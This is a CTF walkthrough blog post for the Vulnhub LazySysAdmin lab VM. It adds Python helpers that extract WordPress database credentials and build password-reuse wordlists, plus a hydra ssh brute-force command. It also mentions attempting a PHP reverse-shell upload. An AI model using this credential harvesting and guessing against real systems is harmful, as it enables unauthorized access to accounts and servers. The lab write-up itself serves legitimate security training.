Vulnhub: LazySysAdmin Walkthrough

dorian5
4 min read · Dec 18, 2020

Sometimes CTFs do make me cry…

Today we are working on LazySysAdmin from Vulnhub.com. This boot2root VM is rated Beginner/Intermediate.

Initial Enumeration

After getting the VM set up in VMware Player, we start with our nmap scans (a full TCP port scan followed by a service/version scan with the default and http-enum scripts on the open ports).
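The scan output drives everything that follows, so it helps to turn it into a checklist rather than read it by eye. The Python below is an added example, not the walkthrough author's code: it parses nmap's XML output (nmap -oX) and maps each open port to the enumeration step used later on this page. The embedded XML is a constructed sample modelled on the services the walkthrough reports (HTTP, SMB, MySQL, IRC); the IP address, product banners and the wordpress path in the suggested commands are assumptions.

```python
"""Triage an nmap -oX scan into follow-up enumeration commands.

Added example for this walkthrough, not the author's code. SAMPLE_NMAP_XML is a
constructed sample; the host address and banners are assumptions.
"""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.168.56.101">
  <host>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn" product="Samba smbd"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="netbios-ssn" product="Samba smbd"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql" product="MySQL"/></port>
      <port protocol="tcp" portid="6667"><state state="open"/><service name="irc" product="InspIRCd"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/><service name="http-proxy"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Follow-up command templates keyed by nmap service name. These are printed as
# suggestions for the operator; nothing in this script executes them.
FOLLOWUPS = {
    "http": "nmap --script http-enum -p {port} {host}; wpscan --url http://{host}/wordpress/ --enumerate u",
    "netbios-ssn": "smbclient -N -L //{host}/; smbmap -H {host}",
    "microsoft-ds": "smbclient -N -L //{host}/; smbmap -H {host}",
    "mysql": "mysql -h {host} -P {port} -u <user> -p",
    "irc": "nmap --script irc-info -p {port} {host}",
    "ssh": "ssh <user>@{host}",
}


def parse_open_ports(xml_text):
    """Return [(host, port, service_name)] for every port nmap marked open."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.findall("host"):
        addr = host.find("address").get("addr")
        for port in host.findall("./ports/port"):
            if port.find("state").get("state") != "open":
                continue  # closed/filtered ports are not enumeration targets
            svc = port.find("service")
            name = svc.get("name") if svc is not None else "unknown"
            results.append((addr, int(port.get("portid")), name))
    return results


def enumeration_plan(xml_text):
    """Map each open port to a follow-up command; unrecognised services get a manual banner grab."""
    plan = []
    for addr, port, name in parse_open_ports(xml_text):
        template = FOLLOWUPS.get(name, "manual: nc -v {host} {port}")
        plan.append((port, name, template.format(host=addr, port=port)))
    return plan


if __name__ == "__main__":
    for port, name, cmd in enumeration_plan(SAMPLE_NMAP_XML):
        print(f"{port:>5}/{name:<12} {cmd}")
```

Run it against a real scan with `nmap -sV -oX scan.xml <ip>` and `ET.parse("scan.xml").getroot()` in place of the sample string; the closed 8080 entry in the sample is there to show that only open ports make it into the plan.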

HTTP Enumeration

The homepage is pretty basic with not much to work from. The http-enum script that we ran in nmap gives us some paths to check; however, nothing jumps out at me as being a particularly interesting attack vector. I ran wpscan against the WordPress folder.

Other than detecting a user of “admin” it didn’t find anything useful. Let’s move on.

SMB Enumeration

nmap also told us that SMB is active on the box. Listing the shares with a null session, we get plenty of interesting stuff in the share$ share. This looks like the web server's document root.

Since these folders are served by the web server, I attempted to upload my PHP reverse shell from pentestmonkey in the hopes of getting a quick shell. None of the folders appear to be writable over SMB, so that route is closed.

I downloaded all the files to my attacker box to look through them.

much stuff was downloaded…

One of the files in the root folder gives us a possible password.

MySQL

In the /wordpress folder I checked wp-config.php to get the MySQL database information (DB_NAME, DB_USER, DB_PASSWORD and DB_HOST are stored there in clear text).

I tried to connect to the database remotely with the mysql client (remember tcp/3306 is open), but no luck: the credentials only work from localhost.
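Pulling the database settings out of wp-config.php by hand is easy for one file, but the same define() lines show up in every WordPress tree you recover from a share, so it is worth scripting. The Python below is an added example, not the walkthrough author's code: it extracts the DB_* constants, ignores commented-out lines, copes with both quote styles, and builds the mysql client command to try against the exposed tcp/3306. The wp-config.php text is a constructed sample; the credential values in it are placeholders, not the VM's real ones.

```python
"""Recover database settings from a WordPress wp-config.php.

Added example, not the walkthrough author's code. SAMPLE_WP_CONFIG is a
constructed sample with placeholder credentials.
"""
import re

SAMPLE_WP_CONFIG = r"""<?php
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
define( 'DB_USER', 'wpuser' );
define("DB_PASSWORD", "S3cr3t'P@ss");   // double-quoted, contains a single quote
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
// define('DB_PASSWORD', 'old-password');   commented-out line must be ignored
define('AUTH_KEY', 'put your unique phrase here');
$table_prefix = 'wp_';
"""

# define('KEY', 'value') at the start of a line. Anchoring on ^ skips lines
# commented out with // or #; a define inside a /* */ block would still match,
# which is an accepted limitation of this line-oriented approach.
DEFINE_RE = re.compile(
    r"""^\s*define\s*\(\s*(['"])(?P<key>[A-Z0-9_]+)\1\s*,\s*"""
    r"""(?P<q>['"])(?P<val>(?:\\.|(?!(?P=q)).)*)(?P=q)\s*\)""",
    re.MULTILINE,
)

DB_KEYS = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST")


def _unescape(val, quote):
    # PHP single-quoted strings only unescape \' and \\; double-quoted strings
    # support more escapes, but these two cover what turns up in passwords.
    return val.replace("\\" + quote, quote).replace("\\\\", "\\")


def parse_defines(php_text):
    """Return {CONSTANT: value} for every uncommented define('X', 'y') line."""
    return {m.group("key"): _unescape(m.group("val"), m.group("q"))
            for m in DEFINE_RE.finditer(php_text)}


def db_settings(php_text):
    """Just the connection settings, with DB_HOST split into host and port like WordPress does."""
    defs = parse_defines(php_text)
    settings = {k: defs.get(k) for k in DB_KEYS}
    host, _, port = (settings["DB_HOST"] or "localhost").partition(":")
    settings["DB_HOST"] = host
    settings["DB_PORT"] = int(port) if port.isdigit() else 3306
    return settings


def mysql_command(settings, remote_host):
    """Client command to test the recovered creds remotely; -p without a value prompts, keeping the password out of argv."""
    return (f"mysql -h {remote_host} -P {settings['DB_PORT']} "
            f"-u {settings['DB_USER']} -p {settings['DB_NAME']}")


if __name__ == "__main__":
    s = db_settings(SAMPLE_WP_CONFIG)
    print(s)
    print(mysql_command(s, "192.168.56.101"))
```

When the remote login is refused, as it was here, the recovered password is still valuable: a DB password that reuses a username or a pattern is a candidate for every other service on the box.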

IRC

From our scans this box has an IRC server. I installed hexchat and connected to the box, but nothing jumped out at me as being useful.

Wordpress

I went back to the WordPress site to see if I could log on with any of the information we found. http://<ip address>/wordpress/wp-login.php is the default login page. Knowing that our admin is lazy and may reuse creds, I tried user ‘admin’ and the password ‘TogieMYSQL12345^^’ that we found during our SMB enumeration, and logged into the WordPress admin page.

I googled exploits for the available plugins since they are so often vulnerable, but didn’t find anything interesting. The admin page always has a quote mentioning “Dolly” (the stock Hello Dolly plugin), so I tried ssh with that user and some of the passwords we’ve discovered, but didn’t have any luck. I then checked out the admin’s profile page.

We have seen “Togie” before in another password, so maybe our admin uses that for ssh.

That’s the combination I use on my luggage!

After a couple of tries, I found that the password “12345” works! Our sysadmin really is lazy. That couldn’t also be the password for his sudo privileges, could it?

yup…

After sudo -l shows that togie has “ALL” sudo privileges, getting the root flag is trivial: sudo -i gives a root shell.
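The whole privilege chain on this box is credential reuse: the SMB-recovered password opens WordPress, a name seen in that password is the ssh user, a digit run from it is the ssh password, and the same password is the sudo password. The Python below is an added example, not the walkthrough author's code: it turns the strings actually found during enumeration into a small, ordered username/password list that a tool such as hydra or a manual ssh loop can consume. Nothing in it connects anywhere. FOUND_USERS and FOUND_PASSWORDS come from this page; the token-splitting rules and the ordering of candidates are my own assumptions.

```python
"""Build a reuse-oriented credential list from secrets found during enumeration.

Added example, not the walkthrough author's code. Generates pairs only; it
performs no logins. The splitting and ordering rules are assumptions.
"""
import re

# Strings surfaced by the enumeration on this page.
FOUND_USERS = ["admin", "togie", "Dolly"]
FOUND_PASSWORDS = ["TogieMYSQL12345^^"]

# Split on case and character-class boundaries:
# 'TogieMYSQL12345^^' -> ['Togie', 'MYSQL', '12345', '^^']
TOKEN_RE = re.compile(r"[A-Z][a-z]+|[A-Z]+(?![a-z])|[a-z]+|\d+|[^A-Za-z0-9]+")


def split_tokens(secret):
    """Return the word, acronym, digit and symbol runs that make up a password."""
    return TOKEN_RE.findall(secret)


def candidate_passwords(secrets, extra=("password", "123456")):
    """Whole secret first, then its tokens in case variants, then the secret minus its symbol suffix."""
    seen, out = set(), []

    def add(p):
        if p and p not in seen:
            seen.add(p)
            out.append(p)

    for s in secrets:
        add(s)  # exact reuse is the most likely case, so it goes first
        toks = split_tokens(s)
        for t in toks:
            if t.isalnum():
                add(t)
                add(t.lower())
                add(t.capitalize())
        # Many "complex" passwords are a plain word plus a symbol run; try it without the run.
        add("".join(t for t in toks if t.isalnum()))
    for e in extra:
        add(e)
    return out


def credential_pairs(users, secrets):
    """Ordered (user, password) pairs, including user==password, with duplicates removed."""
    pws = candidate_passwords(secrets)
    pairs, seen = [], set()
    for u in users:
        for p in [u, u.lower()] + pws:
            if (u, p) not in seen:
                seen.add((u, p))
                pairs.append((u, p))
    return pairs


def write_wordlists(users, secrets, user_path="users.txt", pass_path="passwords.txt"):
    """Write separate user and password files in the -L/-P form hydra expects."""
    with open(user_path, "w") as f:
        f.write("\n".join(users) + "\n")
    with open(pass_path, "w") as f:
        f.write("\n".join(candidate_passwords(secrets)) + "\n")
    return user_path, pass_path


if __name__ == "__main__":
    for user, pw in credential_pairs(FOUND_USERS, FOUND_PASSWORDS):
        print(f"{user}:{pw}")
```

Feed the two files to hydra with `hydra -L users.txt -P passwords.txt ssh://<ip> -t 4`, keeping the thread count low so sshd's MaxStartups does not drop connections and hide a valid hit. The ("togie", "12345") pair that actually worked on this box is the fourth-ish candidate for that user, which is the point: derived candidates go before any dictionary.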

Thanks for reading!
